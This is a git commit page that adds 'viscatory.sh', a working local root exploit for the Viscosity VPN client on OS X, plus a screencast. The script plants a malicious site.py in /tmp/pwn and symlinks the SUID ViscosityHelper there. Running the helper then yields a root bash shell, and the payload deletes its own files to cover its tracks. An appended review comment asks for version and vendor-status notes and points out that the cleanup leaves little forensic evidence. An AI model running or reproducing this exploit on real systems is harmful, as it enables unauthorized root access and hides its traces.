author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-13 05:51:52 +0200 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-08-13 06:00:11 +0200 |
commit | 0d36d2ec75f3098a3a250d84dc38962f0aedfeb6 (patch) | |
tree | 4c04426c47320b3c97404dc5fa4e9e706361a9d0 | |
download | Viscatory-0d36d2ec75f3098a3a250d84dc38962f0aedfeb6.tar.xz Viscatory-0d36d2ec75f3098a3a250d84dc38962f0aedfeb6.zip |
Initial commit of easy local root.
-rw-r--r-- | screencast.ogv | bin | 0 -> 304901 bytes |
-rwxr-xr-x | viscatory.sh | 32 | |
2 files changed, 32 insertions, 0 deletions
diff --git a/screencast.ogv b/screencast.ogv Binary files differnew file mode 100644 index 0000000..b778bf8 --- /dev/null +++ b/screencast.ogv diff --git a/viscatory.sh b/viscatory.sh new file mode 100755 index 0000000..4f323b3 --- /dev/null +++ b/viscatory.sh @@ -0,0 +1,32 @@ +#!/bin/sh +# +########################## +# Viscatory # +# # +# zx2c4 # +########################## +# +# After the hullabaloo from the Tunnelblick local root, savy Mac users +# began defending Viscosity, another OS X VPN client. They figured, since +# they spent money on Viscosity, surely it would be better designed than +# the free alternative. +# +# Unfortunately, this exploit took all of 2 minutes to find. DTrace for +# the win. Here, the SUID helper will execute site.py in its enclosing +# folder. A simple symlink, and we have root. + +echo "[+] Crafting payload." +mkdir -p -v /tmp/pwn +cat > /tmp/pwn/site.py <<_EOF +import os +print "[+] Cleaning up." +os.system("rm -rvf /tmp/pwn") +print "[+] Getting root." +os.setuid(0) +os.setgid(0) +os.execl("/bin/bash", "bash") +_EOF +echo "[+] Making symlink." +ln -s -f -v /Applications/Viscosity.app/Contents/Resources/ViscosityHelper /tmp/pwn/root +echo "[+] Running vulnerable SUID helper." +exec /tmp/pwn/root |
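Review bot: the header comment in viscatory.sh states the root cause (the SUID ViscosityHelper executes site.py from its enclosing folder, found via DTrace) but records neither the Viscosity version this was observed against nor whether the vendor was notified or has shipped a fix, so a reader cannot tell from the script alone whether a copy installed at the hard-coded path /Applications/Viscosity.app/Contents/Resources/ViscosityHelper is still affected; add an "Affected version:" and "Vendor status:" line beside the DTrace remark. It is also worth documenting, for anyone triaging a host, that the payload removes its own working directory via `os.system("rm -rvf /tmp/pwn")` before spawning the shell, so the symlink and site.py will not be present afterwards and the run leaves little on disk to examine.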